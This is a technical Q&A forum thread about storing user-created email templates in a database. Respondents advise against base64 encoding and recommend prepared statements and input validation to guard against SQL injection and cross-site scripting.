storing email text based templates as base64_encode and storing in database

Alex Lord
Alex Lord used Ask the Experts™

Open in new window


Open in new window

So i am creating a basic form to allow users to create text based email templates, it does include files and images but only he the format of links which direct the user to the file so it still is text.

i need to store this in a database which i have done. i am wondering is this the best practice ? i am using CKEDITOR to.

or is their a beter way ?
Watch Question

Do more with

Expert Office
EXPERT OFFICE® is a registered trademark of EXPERTS EXCHANGE®
This sound ok to me.

I'm doing similar to this but using TinyMCE and raw output using the template option that can be embed inside the text editor.

For my case I'm creating some ready to use template for the user so user only need to select the appropriate template from a list.
Those template are html/php files loaded inside the editor so nothing is saved in DB.
David FavorFractional CTO
Distinguished Expert 2018

I'm guessing you're using base64 to save a little space.

You can accomplish the same space saving by just using row compressions, which will leave your data in human readable form.

And as lenamtl said, what you're doing will work too.

My preference is to use row compression, so data can be pulled out + used, without doing a base64 decrypt first.

Base64 does not save space. Base64 actually wastes space - it increases overall usage by about 33% on average.

I would suggest not using Base64 at all. The whole point of Base64 encoding is to store binary data using printable characters (which is why it takes up more space - you're trying to fit 256 possible values from one byte into multiple bytes that only have 64 possible values each. It's the equivalent of being asked what your favorite color is and being given the choices of "blue", "green", and "red" - but your favorite color is "cyan", so you pick blue AND green (you've picked multiple colors that, when together, make the original one color).

You can still store in in the database, but either use escaping on the value or use a prepared statement / query to insert the value so you're not opening yourself up to SQL injection.

I'd also HEAVILY caution against any sort of cross-user template usage (e.g. user A creates a template and user B can see it). This is just begging to be abused by a malicious user who injects malicious code into a template. Just because the code can be inserted without SQL injection doesn't mean it's safe. A malicious user could inject some Javascript (e.g. in a <script> tag or an event handler like a click or mousemove), and have it redirect a good user to a bad or malicious site or open them up to XSS (e.g. dump cookies to a remote site and allow session hijacking).

You need to be VERY thorough in validating any input from users. Remember that malicious users don't have to play by the rules. It's easy to bypass any client-side validation and restrictions and simply upload whatever data you want, so you need to actually check the results before allowing them to be used.

Do more with

Expert Office
Submit tech questions to Ask the Experts™ at any time to receive solutions, advice, and new ideas from leading industry professionals.

Start 7-Day Free Trial